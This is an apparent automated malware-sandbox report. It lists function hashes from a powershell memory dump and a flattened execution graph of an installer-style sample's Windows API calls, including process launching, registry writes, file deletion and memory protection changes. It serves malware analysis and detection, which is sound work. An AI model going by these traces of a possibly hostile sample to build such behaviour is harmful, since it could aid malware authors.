                                                          • Opcode ID: 00ccf45394e1573922b2d76d617be1696a761ebfdd4f64dc6943f95d20b2b49d
                                                          • Instruction ID: 2bb14f62c631f7bc90358492a6ee7a5caeadff9cb5183bfe34fafb7435e7e9ad
                                                          • Opcode Fuzzy Hash: 00ccf45394e1573922b2d76d617be1696a761ebfdd4f64dc6943f95d20b2b49d
                                                          • Instruction Fuzzy Hash: 69F0303276C6084FD74CAA1CF8439B573D1E789220B40416EE48BC2697E917B8438685
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FFBABFF4392 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.496720875.00007FFBABFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABFF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffbabff0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67de012fe2931bafd32d81357c45a5d67eaf6fc48e9d6bf570e064ceaaa34534
                                                          • Instruction ID: e6f06e085d37e479dc889395c98b6721ef59c5f571632d5c533f7d835d75cb53
                                                          • Opcode Fuzzy Hash: 67de012fe2931bafd32d81357c45a5d67eaf6fc48e9d6bf570e064ceaaa34534
                                                          • Instruction Fuzzy Hash: 15E0C07276D6184F970DDA0CF8539F573D1E789324B40016EE48BC6657E916B8438685
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:20.4%
                                                          Dynamic/Decrypted Code Coverage:13.3%
                                                          Signature Coverage:19.7%
                                                          Total number of Nodes:1574
                                                          Total number of Limit Nodes:42
                                                          execution_graph 5159 10001000 5162 1000101b 5159->5162 5169 10001516 5162->5169 5164 10001020 5165 10001024 5164->5165 5166 10001027 GlobalAlloc 5164->5166 5167 1000153d 3 API calls 5165->5167 5166->5165 5168 10001019 5167->5168 5171 1000151c 5169->5171 5170 10001522 5170->5164 5171->5170 5172 1000152e GlobalFree 5171->5172 5172->5164 4176 401941 4177 401943 4176->4177 4178 402c37 17 API calls 4177->4178 4179 401948 4178->4179 4182 40595a 4179->4182 4221 405c25 4182->4221 4185 405982 DeleteFileW 4187 401951 4185->4187 4186 405999 4188 405ab9 4186->4188 4235 40624c lstrcpynW 4186->4235 4188->4187 4253 40658f FindFirstFileW 4188->4253 4190 4059bf 4191 4059d2 4190->4191 4192 4059c5 lstrcatW 4190->4192 4236 405b69 lstrlenW 4191->4236 4195 4059d8 4192->4195 4196 4059e8 lstrcatW 4195->4196 4198 4059f3 lstrlenW FindFirstFileW 4195->4198 4196->4198 4198->4188 4201 405a15 4198->4201 4199 405ae2 4256 405b1d lstrlenW CharPrevW 4199->4256 4203 405a9c FindNextFileW 4201->4203 4215 405a5d 4201->4215 4240 40624c lstrcpynW 4201->4240 4203->4201 4207 405ab2 FindClose 4203->4207 4204 405912 5 API calls 4206 405af4 4204->4206 4208 405b0e 4206->4208 4211 405af8 4206->4211 4207->4188 4210 4052b0 24 API calls 4208->4210 4210->4187 4211->4187 4212 4052b0 24 API calls 4211->4212 4214 405b05 4212->4214 4213 40595a 60 API calls 4213->4215 4217 406012 36 API calls 4214->4217 4215->4203 4215->4213 4216 4052b0 24 API calls 4215->4216 4219 4052b0 24 API calls 4215->4219 4241 405912 4215->4241 4249 406012 MoveFileExW 4215->4249 4216->4203 4218 405b0c 4217->4218 4218->4187 4219->4215 4259 40624c lstrcpynW 4221->4259 4223 405c36 4260 405bc8 CharNextW CharNextW 4223->4260 4226 40597a 4226->4185 4226->4186 4227 4064e0 5 API calls 4233 405c4c 4227->4233 4228 405c7d lstrlenW 4229 405c88 4228->4229 4228->4233 4230 405b1d 3 API calls 4229->4230 4232 405c8d GetFileAttributesW 4230->4232 4231 40658f 2 API calls 4231->4233 4232->4226 4233->4226 4233->4228 4233->4231 4234 405b69 2 API calls 4233->4234 4234->4228 4235->4190 4237 405b77 4236->4237 4238 405b89 4237->4238 4239 405b7d CharPrevW 4237->4239 4238->4195 4239->4237 4239->4238 4240->4201 4266 405d19 GetFileAttributesW 4241->4266 4243 40593f 4243->4215 4245 405935 DeleteFileW 4247 40593b 4245->4247 4246 40592d RemoveDirectoryW 4246->4247 4247->4243 4248 40594b SetFileAttributesW 4247->4248 4248->4243 4250 406026 4249->4250 4252 406033 4249->4252 4269 405e98 4250->4269 4252->4215 4254 405ade 4253->4254 4255 4065a5 FindClose 4253->4255 4254->4187 4254->4199 4255->4254 4257 405ae8 4256->4257 4258 405b39 lstrcatW 4256->4258 4257->4204 4258->4257 4259->4223 4261 405be5 4260->4261 4262 405bf7 4260->4262 4261->4262 4263 405bf2 CharNextW 4261->4263 4264 405b4a CharNextW 4262->4264 4265 405c1b 4262->4265 4263->4265 4264->4262 4265->4226 4265->4227 4267 40591e 4266->4267 4268 405d2b SetFileAttributesW 4266->4268 4267->4243 4267->4245 4267->4246 4268->4267 4270 405ec8 4269->4270 4271 405eee GetShortPathNameW 4269->4271 4296 405d3e GetFileAttributesW CreateFileW 4270->4296 4273 405f03 4271->4273 4274 40600d 4271->4274 4273->4274 4276 405f0b wsprintfA 4273->4276 4274->4252 4275 405ed2 CloseHandle GetShortPathNameW 4275->4274 4278 405ee6 4275->4278 4277 40626e 17 API calls 4276->4277 4279 405f33 4277->4279 4278->4271 4278->4274 4297 405d3e GetFileAttributesW CreateFileW 4279->4297 4281 405f40 4281->4274 4282 405f4f GetFileSize GlobalAlloc 4281->4282 4283 405f71 4282->4283 4284 406006 CloseHandle 4282->4284 4298 405dc1 ReadFile 4283->4298 4284->4274 4289 405f90 lstrcpyA 4292 405fb2 4289->4292 4290 405fa4 4291 405ca3 4 API calls 4290->4291 4291->4292 4293 405fe9 SetFilePointer 4292->4293 4305 405df0 WriteFile 4293->4305 4296->4275 4297->4281 4299 405ddf 4298->4299 4299->4284 4300 405ca3 lstrlenA 4299->4300 4301 405ce4 lstrlenA 4300->4301 4302 405cec 4301->4302 4303 405cbd lstrcmpiA 4301->4303 4302->4289 4302->4290 4303->4302 4304 405cdb CharNextA 4303->4304 4304->4301 4306 405e0e GlobalFree 4305->4306 4306->4284 4307 4015c1 4308 402c37 17 API calls 4307->4308 4309 4015c8 4308->4309 4310 405bc8 4 API calls 4309->4310 4322 4015d1 4310->4322 4311 401631 4313 401663 4311->4313 4314 401636 4311->4314 4312 405b4a CharNextW 4312->4322 4316 401423 24 API calls 4313->4316 4334 401423 4314->4334 4324 40165b 4316->4324 4320 40164a SetCurrentDirectoryW 4320->4324 4322->4311 4322->4312 4323 401617 GetFileAttributesW 4322->4323 4326 405819 4322->4326 4329 40577f CreateDirectoryW 4322->4329 4338 4057fc CreateDirectoryW 4322->4338 4323->4322 4341 406626 GetModuleHandleA 4326->4341 4330 4057d0 GetLastError 4329->4330 4331 4057cc 4329->4331 4330->4331 4332 4057df SetFileSecurityW 4330->4332 4331->4322 4332->4331 4333 4057f5 GetLastError 4332->4333 4333->4331 4335 4052b0 24 API calls 4334->4335 4336 401431 4335->4336 4337 40624c lstrcpynW 4336->4337 4337->4320 4339 405810 GetLastError 4338->4339 4340 40580c 4338->4340 4339->4340 4340->4322 4342 406642 4341->4342 4343 40664c GetProcAddress 4341->4343 4347 4065b6 GetSystemDirectoryW 4342->4347 4345 405820 4343->4345 4345->4322 4346 406648 4346->4343 4346->4345 4348 4065d8 wsprintfW LoadLibraryExW 4347->4348 4348->4346 4353 401e43 4361 402c15 4353->4361 4355 401e49 4356 402c15 17 API calls 4355->4356 4357 401e55 4356->4357 4358 401e61 ShowWindow 4357->4358 4359 401e6c EnableWindow 4357->4359 4360 402abf 4358->4360 4359->4360 4362 40626e 17 API calls 4361->4362 4363 402c2a 4362->4363 4363->4355 4368 402644 4369 402c15 17 API calls 4368->4369 4377 402653 4369->4377 4370 402790 4371 40269d ReadFile 4371->4370 4371->4377 4372 402736 4372->4370 4372->4377 4382 405e1f SetFilePointer 4372->4382 4373 405dc1 ReadFile 4373->4377 4375 402792 4391 406193 wsprintfW 4375->4391 4376 4026dd MultiByteToWideChar 4376->4377 4377->4370 4377->4371 4377->4372 4377->4373 4377->4375 4377->4376 4379 402703 SetFilePointer MultiByteToWideChar 4377->4379 4380 4027a3 4377->4380 4379->4377 4380->4370 4381 4027c4 SetFilePointer 4380->4381 4381->4370 4383 405e3b 4382->4383 4384 405e57 4382->4384 4385 405dc1 ReadFile 4383->4385 4384->4372 4386 405e47 4385->4386 4386->4384 4387 405e60 SetFilePointer 4386->4387 4388 405e88 SetFilePointer 4386->4388 4387->4388 4389 405e6b 4387->4389 4388->4384 4390 405df0 WriteFile 4389->4390 4390->4384 4391->4370 5173 402348 5174 402c37 17 API calls 5173->5174 5175 402357 5174->5175 5176 402c37 17 API calls 5175->5176 5177 402360 5176->5177 5178 402c37 17 API calls 5177->5178 5179 40236a GetPrivateProfileStringW 5178->5179 5190 4016cc 5191 402c37 17 API calls 5190->5191 5192 4016d2 GetFullPathNameW 5191->5192 5194 4016ec 5192->5194 5199 40170e 5192->5199 5193 401723 GetShortPathNameW 5195 402abf 5193->5195 5196 40658f 2 API calls 5194->5196 5194->5199 5197 4016fe 5196->5197 5197->5199 5200 40624c lstrcpynW 5197->5200 5199->5193 5199->5195 5200->5199 5201 401b4d 5202 402c37 17 API calls 5201->5202 5203 401b54 5202->5203 5204 402c15 17 API calls 5203->5204 5205 401b5d wsprintfW 5204->5205 5206 402abf 5205->5206 5207 401f52 5208 402c37 17 API calls 5207->5208 5209 401f59 5208->5209 5210 40658f 2 API calls 5209->5210 5211 401f5f 5210->5211 5213 401f70 5211->5213 5214 406193 wsprintfW 5211->5214 5214->5213 5215 402253 5216 402c37 17 API calls 5215->5216 5217 402259 5216->5217 5218 402c37 17 API calls 5217->5218 5219 402262 5218->5219 5220 402c37 17 API calls 5219->5220 5221 40226b 5220->5221 5222 40658f 2 API calls 5221->5222 5223 402274 5222->5223 5224 402285 lstrlenW lstrlenW 5223->5224 5228 402278 5223->5228 5226 4052b0 24 API calls 5224->5226 5225 4052b0 24 API calls 5229 402280 5225->5229 5227 4022c3 SHFileOperationW 5226->5227 5227->5228 5227->5229 5228->5225 5230 401956 5231 402c37 17 API calls 5230->5231 5232 40195d lstrlenW 5231->5232 5233 40258c 5232->5233 5234 406956 5236 4067da 5234->5236 5235 407145 5236->5235 5237 406864 GlobalAlloc 5236->5237 5238 40685b GlobalFree 5236->5238 5239 4068d2 GlobalFree 5236->5239 5240 4068db GlobalAlloc 5236->5240 5237->5235 5237->5236 5238->5237 5239->5240 5240->5235 5240->5236 4877 4014d7 4878 402c15 17 API calls 4877->4878 4879 4014dd Sleep 4878->4879 4881 402abf 4879->4881 5241 401d57 GetDlgItem GetClientRect 5242 402c37 17 API calls 5241->5242 5243 401d89 LoadImageW SendMessageW 5242->5243 5244 401da7 DeleteObject 5243->5244 5245 402abf 5243->5245 5244->5245 5246 4022d7 5247 4022f1 5246->5247 5248 4022de 5246->5248 5249 40626e 17 API calls 5248->5249 5250 4022eb 5249->5250 5251 4058ae MessageBoxIndirectW 5250->5251 5251->5247 5252 402dd7 5253 402de9 SetTimer 5252->5253 5255 402e02 5252->5255 5253->5255 5254 402e57 5255->5254 5256 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5255->5256 5256->5254 4882 40175c 4883 402c37 17 API calls 4882->4883 4884 401763 4883->4884 4888 405d6d 4884->4888 4886 40176a 4887 405d6d 2 API calls 4886->4887 4887->4886 4889 405d7a GetTickCount GetTempFileNameW 4888->4889 4890 405db0 4889->4890 4891 405db4 4889->4891 4890->4889 4890->4891 4891->4886 5134 4023de 5135 402c37 17 API calls 5134->5135 5136 4023f0 5135->5136 5137 402c37 17 API calls 5136->5137 5138 4023fa 5137->5138 5151 402cc7 5138->5151 5141 402885 5142 402432 5143 40243e 5142->5143 5145 402c15 17 API calls 5142->5145 5146 40245d RegSetValueExW 5143->5146 5148 4030fa 35 API calls 5143->5148 5144 402c37 17 API calls 5147 402428 lstrlenW 5144->5147 5145->5143 5149 402473 RegCloseKey 5146->5149 5147->5142 5148->5146 5149->5141 5152 402ce2 5151->5152 5155 4060e7 5152->5155 5156 4060f6 5155->5156 5157 406101 RegCreateKeyExW 5156->5157 5158 40240a 5156->5158 5157->5158 5158->5141 5158->5142 5158->5144 5264 402862 5265 402c37 17 API calls 5264->5265 5266 402869 FindFirstFileW 5265->5266 5267 402891 5266->5267 5270 40287c 5266->5270 5272 406193 wsprintfW 5267->5272 5269 40289a 5273 40624c lstrcpynW 5269->5273 5272->5269 5273->5270 5274 401563 5275 402a65 5274->5275 5278 406193 wsprintfW 5275->5278 5277 402a6a 5278->5277 5279 401968 5280 402c15 17 API calls 5279->5280 5281 40196f 5280->5281 5282 402c15 17 API calls 5281->5282 5283 40197c 5282->5283 5284 402c37 17 API calls 5283->5284 5285 401993 lstrlenW 5284->5285 5286 4019a4 5285->5286 5287 4019e5 5286->5287 5291 40624c lstrcpynW 5286->5291 5289 4019d5 5289->5287 5290 4019da lstrlenW 5289->5290 5290->5287 5291->5289 4541 4027e9 4542 4027f0 4541->4542 4543 402a6a 4541->4543 4544 402c15 17 API calls 4542->4544 4545 4027f7 4544->4545 4546 402806 SetFilePointer 4545->4546 4546->4543 4547 402816 4546->4547 4549 406193 wsprintfW 4547->4549 4549->4543 5292 404669 5293 404679 5292->5293 5294 40469f 5292->5294 5295 4041e1 18 API calls 5293->5295 5296 404248 8 API calls 5294->5296 5297 404686 SetDlgItemTextW 5295->5297 5298 4046ab 5296->5298 5297->5294 5299 100018a9 5300 100018cc 5299->5300 5301 100018ff GlobalFree 5300->5301 5302 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5300->5302 5301->5302 5303 10001272 2 API calls 5302->5303 5304 10001a87 GlobalFree GlobalFree 5303->5304 5305 40166a 5306 402c37 17 API calls 5305->5306 5307 401670 5306->5307 5308 40658f 2 API calls 5307->5308 5309 401676 5308->5309 5310 401ced 5311 402c15 17 API calls 5310->5311 5312 401cf3 IsWindow 5311->5312 5313 401a20 5312->5313 4731 40176f 4732 402c37 17 API calls 4731->4732 4733 401776 4732->4733 4734 401796 4733->4734 4735 40179e 4733->4735 4791 40624c lstrcpynW 4734->4791 4792 40624c lstrcpynW 4735->4792 4738 40179c 4741 4064e0 5 API calls 4738->4741 4739 4017a9 4740 405b1d 3 API calls 4739->4740 4742 4017af lstrcatW 4740->4742 4752 4017bb 4741->4752 4742->4738 4743 40658f 2 API calls 4743->4752 4744 405d19 2 API calls 4744->4752 4746 4017cd CompareFileTime 4746->4752 4747 40188d 4748 4052b0 24 API calls 4747->4748 4749 401897 4748->4749 4770 4030fa 4749->4770 4750 4052b0 24 API calls 4768 401879 4750->4768 4751 40624c lstrcpynW 4751->4752 4752->4743 4752->4744 4752->4746 4752->4747 4752->4751 4756 40626e 17 API calls 4752->4756 4767 401864 4752->4767 4769 405d3e GetFileAttributesW CreateFileW 4752->4769 4793 4058ae 4752->4793 4755 4018be SetFileTime 4757 4018d0 FindCloseChangeNotification 4755->4757 4756->4752 4758 4018e1 4757->4758 4757->4768 4759 4018e6 4758->4759 4760 4018f9 4758->4760 4761 40626e 17 API calls 4759->4761 4762 40626e 17 API calls 4760->4762 4764 4018ee lstrcatW 4761->4764 4765 401901 4762->4765 4764->4765 4766 4058ae MessageBoxIndirectW 4765->4766 4766->4768 4767->4750 4767->4768 4769->4752 4771 403113 4770->4771 4772 40313e 4771->4772 4807 4032f5 SetFilePointer 4771->4807 4797 4032df 4772->4797 4776 4018aa 4776->4755 4776->4757 4777 40315b GetTickCount 4780 40316e 4777->4780 4778 40327f 4779 403283 4778->4779 4784 40329b 4778->4784 4781 4032df ReadFile 4779->4781 4780->4776 4783 4032df ReadFile 4780->4783 4787 4031d4 GetTickCount 4780->4787 4788 4031fd MulDiv wsprintfW 4780->4788 4790 405df0 WriteFile 4780->4790 4800 4067a7 4780->4800 4781->4776 4782 4032df ReadFile 4782->4784 4783->4780 4784->4776 4784->4782 4785 405df0 WriteFile 4784->4785 4785->4784 4787->4780 4789 4052b0 24 API calls 4788->4789 4789->4780 4790->4780 4791->4738 4792->4739 4794 4058c3 4793->4794 4795 40590f 4794->4795 4796 4058d7 MessageBoxIndirectW 4794->4796 4795->4752 4796->4795 4798 405dc1 ReadFile 4797->4798 4799 403149 4798->4799 4799->4776 4799->4777 4799->4778 4801 4067cc 4800->4801 4802 4067d4 4800->4802 4801->4780 4802->4801 4803 406864 GlobalAlloc 4802->4803 4804 40685b GlobalFree 4802->4804 4805 4068d2 GlobalFree 4802->4805 4806 4068db GlobalAlloc 4802->4806 4803->4801 4803->4802 4804->4803 4805->4806 4806->4801 4806->4802 4807->4772 4808 4053ef 4809 405410 GetDlgItem GetDlgItem GetDlgItem 4808->4809 4810 405599 4808->4810 4854 404216 SendMessageW 4809->4854 4812 4055a2 GetDlgItem CreateThread FindCloseChangeNotification 4810->4812 4813 4055ca 4810->4813 4812->4813 4857 405383 OleInitialize 4812->4857 4815 4055f5 4813->4815 4816 4055e1 ShowWindow ShowWindow 4813->4816 4817 40561a 4813->4817 4814 405480 4820 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4814->4820 4818 405601 4815->4818 4821 405655 4815->4821 4856 404216 SendMessageW 4816->4856 4819 404248 8 API calls 4817->4819 4823 405609 4818->4823 4824 40562f ShowWindow 4818->4824 4826 405628 4819->4826 4829 4054f5 4820->4829 4830 4054d9 SendMessageW SendMessageW 4820->4830 4821->4817 4831 405663 SendMessageW 4821->4831 4825 4041ba SendMessageW 4823->4825 4827 405641 4824->4827 4828 40564f 4824->4828 4825->4817 4832 4052b0 24 API calls 4827->4832 4833 4041ba SendMessageW 4828->4833 4834 405508 4829->4834 4835 4054fa SendMessageW 4829->4835 4830->4829 4831->4826 4836 40567c CreatePopupMenu 4831->4836 4832->4828 4833->4821 4838 4041e1 18 API calls 4834->4838 4835->4834 4837 40626e 17 API calls 4836->4837 4839 40568c AppendMenuW 4837->4839 4840 405518 4838->4840 4843 4056a9 GetWindowRect 4839->4843 4844 4056bc TrackPopupMenu 4839->4844 4841 405521 ShowWindow 4840->4841 4842 405555 GetDlgItem SendMessageW 4840->4842 4845 405544 4841->4845 4846 405537 ShowWindow 4841->4846 4842->4826 4848 40557c SendMessageW SendMessageW 4842->4848 4843->4844 4844->4826 4847 4056d7 4844->4847 4855 404216 SendMessageW 4845->4855 4846->4845 4849 4056f3 SendMessageW 4847->4849 4848->4826 4849->4849 4850 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4849->4850 4852 405735 SendMessageW 4850->4852 4852->4852 4853 40575e GlobalUnlock SetClipboardData CloseClipboard 4852->4853 4853->4826 4854->4814 4855->4842 4856->4815 4858 40422d SendMessageW 4857->4858 4861 4053a6 4858->4861 4859 4053cd 4860 40422d SendMessageW 4859->4860 4862 4053df OleUninitialize 4860->4862 4861->4859 4863 401389 2 API calls 4861->4863 4863->4861 5314 402570 5315 402c37 17 API calls 5314->5315 5316 402577 5315->5316 5319 405d3e GetFileAttributesW CreateFileW 5316->5319 5318 402583 5319->5318 5320 401b71 5321 401bc2 5320->5321 5322 401b7e 5320->5322 5323 401bc7 5321->5323 5324 401bec GlobalAlloc 5321->5324 5325 401c07 5322->5325 5330 401b95 5322->5330 5334 4022f1 5323->5334 5341 40624c lstrcpynW 5323->5341 5327 40626e 17 API calls 5324->5327 5326 40626e 17 API calls 5325->5326 5325->5334 5329 4022eb 5326->5329 5327->5325 5333 4058ae MessageBoxIndirectW 5329->5333 5339 40624c lstrcpynW 5330->5339 5331 401bd9 GlobalFree 5331->5334 5333->5334 5335 401ba4 5340 40624c lstrcpynW 5335->5340 5337 401bb3 5342 40624c lstrcpynW 5337->5342 5339->5335 5340->5337 5341->5331 5342->5334 4864 4024f2 4865 402c77 17 API calls 4864->4865 4866 4024fc 4865->4866 4867 402c15 17 API calls 4866->4867 4868 402505 4867->4868 4869 402514 4868->4869 4874 402885 4868->4874 4870 402521 RegEnumKeyW 4869->4870 4871 40252d RegEnumValueW 4869->4871 4872 402549 RegCloseKey 4870->4872 4871->4872 4873 402542 4871->4873 4872->4874 4873->4872 5343 401a72 5344 402c15 17 API calls 5343->5344 5345 401a78 5344->5345 5346 402c15 17 API calls 5345->5346 5347 401a20 5346->5347 5348 401573 5349 401583 ShowWindow 5348->5349 5350 40158c 5348->5350 5349->5350 5351 40159a ShowWindow 5350->5351 5352 402abf 5350->5352 5351->5352 4876 405874 ShellExecuteExW 5353 4042f5 lstrcpynW lstrlenW 5354 4014f5 SetForegroundWindow 5355 402abf 5354->5355 5363 100016b6 5364 100016e5 5363->5364 5365 10001b18 22 API calls 5364->5365 5366 100016ec 5365->5366 5367 100016f3 5366->5367 5368 100016ff 5366->5368 5371 10001272 2 API calls 5367->5371 5369 10001726 5368->5369 5370 10001709 5368->5370 5374 10001750 5369->5374 5375 1000172c 5369->5375 5373 1000153d 3 API calls 5370->5373 5372 100016fd 5371->5372 5377 1000170e 5373->5377 5376 1000153d 3 API calls 5374->5376 5378 100015b4 3 API calls 5375->5378 5376->5372 5379 100015b4 3 API calls 5377->5379 5380 10001731 5378->5380 5381 10001714 5379->5381 5382 10001272 2 API calls 5380->5382 5383 10001272 2 API calls 5381->5383 5384 10001737 GlobalFree 5382->5384 5385 1000171a GlobalFree 5383->5385 5384->5372 5386 1000174b GlobalFree 5384->5386 5385->5372 5386->5372 5387 401e77 5388 402c37 17 API calls 5387->5388 5389 401e7d 5388->5389 5390 402c37 17 API calls 5389->5390 5391 401e86 5390->5391 5392 402c37 17 API calls 5391->5392 5393 401e8f 5392->5393 5394 402c37 17 API calls 5393->5394 5395 401e98 5394->5395 5396 401423 24 API calls 5395->5396 5397 401e9f 5396->5397 5404 405874 ShellExecuteExW 5397->5404 5399 401ee1 5400 4066d7 5 API calls 5399->5400 5401 402885 5399->5401 5402 401efb CloseHandle 5400->5402 5402->5401 5404->5399 5405 10002238 5406 10002296 5405->5406 5408 100022cc 5405->5408 5407 100022a8 GlobalAlloc 5406->5407 5406->5408 5407->5406 5409 40167b 5410 402c37 17 API calls 5409->5410 5411 401682 5410->5411 5412 402c37 17 API calls 5411->5412 5413 40168b 5412->5413 5414 402c37 17 API calls 5413->5414 5415 401694 MoveFileW 5414->5415 5416 4016a7 5415->5416 5422 4016a0 5415->5422 5417 40658f 2 API calls 5416->5417 5419 40224a 5416->5419 5420 4016b6 5417->5420 5418 401423 24 API calls 5418->5419 5420->5419 5421 406012 36 API calls 5420->5421 5421->5422 5422->5418 5423 1000103d 5424 1000101b 5 API calls 5423->5424 5425 10001056 5424->5425 5122 40247e 5123 402c77 17 API calls 5122->5123 5124 402488 5123->5124 5125 402c37 17 API calls 5124->5125 5126 402491 5125->5126 5127 40249c RegQueryValueExW 5126->5127 5131 402885 5126->5131 5128 4024bc 5127->5128 5129 4024c2 RegCloseKey 5127->5129 5128->5129 5133 406193 wsprintfW 5128->5133 5129->5131 5133->5129 5426 40437e 5427 404396 5426->5427 5431 4044b0 5426->5431 5432 4041e1 18 API calls 5427->5432 5428 40451a 5429 4045e4 5428->5429 5430 404524 GetDlgItem 5428->5430 5437 404248 8 API calls 5429->5437 5433 4045a5 5430->5433 5434 40453e 5430->5434 5431->5428 5431->5429 5435 4044eb GetDlgItem SendMessageW 5431->5435 5436 4043fd 5432->5436 5433->5429 5438 4045b7 5433->5438 5434->5433 5442 404564 SendMessageW LoadCursorW SetCursor 5434->5442 5459 404203 KiUserCallbackDispatcher 5435->5459 5440 4041e1 18 API calls 5436->5440 5441 4045df 5437->5441 5443 4045cd 5438->5443 5444 4045bd SendMessageW 5438->5444 5446 40440a CheckDlgButton 5440->5446 5463 40462d 5442->5463 5443->5441 5448 4045d3 SendMessageW 5443->5448 5444->5443 5445 404515 5460 404609 5445->5460 5457 404203 KiUserCallbackDispatcher 5446->5457 5448->5441 5452 404428 GetDlgItem 5458 404216 SendMessageW 5452->5458 5454 40443e SendMessageW 5455 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5454->5455 5456 40445b GetSysColor 5454->5456 5455->5441 5456->5455 5457->5452 5458->5454 5459->5445 5461 404617 5460->5461 5462 40461c SendMessageW 5460->5462 5461->5462 5462->5428 5466 405874 ShellExecuteExW 5463->5466 5465 404593 LoadCursorW SetCursor 5465->5433 5466->5465 5467 4020fe 5468 402c37 17 API calls 5467->5468 5469 402105 5468->5469 5470 402c37 17 API calls 5469->5470 5471 40210f 5470->5471 5472 402c37 17 API calls 5471->5472 5473 402119 5472->5473 5474 402c37 17 API calls 5473->5474 5475 402123 5474->5475 5476 402c37 17 API calls 5475->5476 5477 40212d 5476->5477 5478 40216c CoCreateInstance 5477->5478 5479 402c37 17 API calls 5477->5479 5482 40218b 5478->5482 5479->5478 5480 401423 24 API calls 5481 40224a 5480->5481 5482->5480 5482->5481 5483 4019ff 5484 402c37 17 API calls 5483->5484 5485 401a06 5484->5485 5486 402c37 17 API calls 5485->5486 5487 401a0f 5486->5487 5488 401a16 lstrcmpiW 5487->5488 5489 401a28 lstrcmpW 5487->5489 5490 401a1c 5488->5490 5489->5490 4089 401f00 4104 402c37 4089->4104 4096 401f39 CloseHandle 4100 402885 4096->4100 4099 401f2b 4101 401f30 4099->4101 4102 401f3b 4099->4102 4129 406193 wsprintfW 4101->4129 4102->4096 4105 402c43 4104->4105 4130 40626e 4105->4130 4108 401f06 4110 4052b0 4108->4110 4112 4052cb 4110->4112 4120 401f10 4110->4120 4111 4052e7 lstrlenW 4114 405310 4111->4114 4115 4052f5 lstrlenW 4111->4115 4112->4111 4113 40626e 17 API calls 4112->4113 4113->4111 4117 405323 4114->4117 4118 405316 SetWindowTextW 4114->4118 4116 405307 lstrcatW 4115->4116 4115->4120 4116->4114 4119 405329 SendMessageW SendMessageW SendMessageW 4117->4119 4117->4120 4118->4117 4119->4120 4121 405831 CreateProcessW 4120->4121 4122 401f16 4121->4122 4123 405864 CloseHandle 4121->4123 4122->4096 4122->4100 4124 4066d7 WaitForSingleObject 4122->4124 4123->4122 4125 4066f1 4124->4125 4126 406703 GetExitCodeProcess 4125->4126 4172 406662 4125->4172 4126->4099 4129->4096 4143 40627b 4130->4143 4131 4064c6 4132 402c64 4131->4132 4163 40624c lstrcpynW 4131->4163 4132->4108 4147 4064e0 4132->4147 4134 406494 lstrlenW 4134->4143 4137 40626e 10 API calls 4137->4134 4139 4063a9 GetSystemDirectoryW 4139->4143 4140 4063bc GetWindowsDirectoryW 4140->4143 4141 4064e0 5 API calls 4141->4143 4142 4063f0 SHGetSpecialFolderLocation 4142->4143 4146 406408 SHGetPathFromIDListW CoTaskMemFree 4142->4146 4143->4131 4143->4134 4143->4137 4143->4139 4143->4140 4143->4141 4143->4142 4144 40626e 10 API calls 4143->4144 4145 406437 lstrcatW 4143->4145 4156 40611a 4143->4156 4161 406193 wsprintfW 4143->4161 4162 40624c lstrcpynW 4143->4162 4144->4143 4145->4143 4146->4143 4154 4064ed 4147->4154 4148 406563 4149 406568 CharPrevW 4148->4149 4152 406589 4148->4152 4149->4148 4150 406556 CharNextW 4150->4148 4150->4154 4152->4108 4153 406542 CharNextW 4153->4154 4154->4148 4154->4150 4154->4153 4155 406551 CharNextW 4154->4155 4168 405b4a 4154->4168 4155->4150 4164 4060b9 4156->4164 4159 40617e 4159->4143 4160 40614e RegQueryValueExW RegCloseKey 4160->4159 4161->4143 4162->4143 4163->4132 4165 4060c8 4164->4165 4166 4060d1 RegOpenKeyExW 4165->4166 4167 4060cc 4165->4167 4166->4167 4167->4159 4167->4160 4169 405b50 4168->4169 4170 405b66 4169->4170 4171 405b57 CharNextW 4169->4171 4170->4154 4171->4169 4173 40667f PeekMessageW 4172->4173 4174 406675 DispatchMessageW 4173->4174 4175 40668f WaitForSingleObject 4173->4175 4174->4173 4175->4125 5491 401000 5492 401037 BeginPaint GetClientRect 5491->5492 5493 40100c DefWindowProcW 5491->5493 5495 4010f3 5492->5495 5496 401179 5493->5496 5497 401073 CreateBrushIndirect FillRect DeleteObject 5495->5497 5498 4010fc 5495->5498 5497->5495 5499 401102 CreateFontIndirectW 5498->5499 5500 401167 EndPaint 5498->5500 5499->5500 5501 401112 6 API calls 5499->5501 5500->5496 5501->5500 4350 100027c2 4351 10002812 4350->4351 4352 100027d2 VirtualProtect 4350->4352 4352->4351 5502 401503 5503 40150b 5502->5503 5505 40151e 5502->5505 5504 402c15 17 API calls 5503->5504 5504->5505 4392 402306 4393 402314 4392->4393 4394 40230e 4392->4394 4396 402c37 17 API calls 4393->4396 4399 402322 4393->4399 4395 402c37 17 API calls 4394->4395 4395->4393 4396->4399 4397 402c37 17 API calls 4400 402330 4397->4400 4398 402c37 17 API calls 4401 402339 WritePrivateProfileStringW 4398->4401 4399->4397 4399->4400 4400->4398 5506 404a06 5507 404a32 5506->5507 5508 404a16 5506->5508 5510 404a65 5507->5510 5511 404a38 SHGetPathFromIDListW 5507->5511 5517 405892 GetDlgItemTextW 5508->5517 5513 404a4f SendMessageW 5511->5513 5514 404a48 5511->5514 5512 404a23 SendMessageW 5512->5507 5513->5510 5515 40140b 2 API calls 5514->5515 5515->5513 5517->5512 5518 401f86 5519 402c37 17 API calls 5518->5519 5520 401f8d 5519->5520 5521 406626 5 API calls 5520->5521 5522 401f9c 5521->5522 5523 401fb8 GlobalAlloc 5522->5523 5524 402020 5522->5524 5523->5524 5525 401fcc 5523->5525 5526 406626 5 API calls 5525->5526 5527 401fd3 5526->5527 5528 406626 5 API calls 5527->5528 5529 401fdd 5528->5529 5529->5524 5533 406193 wsprintfW 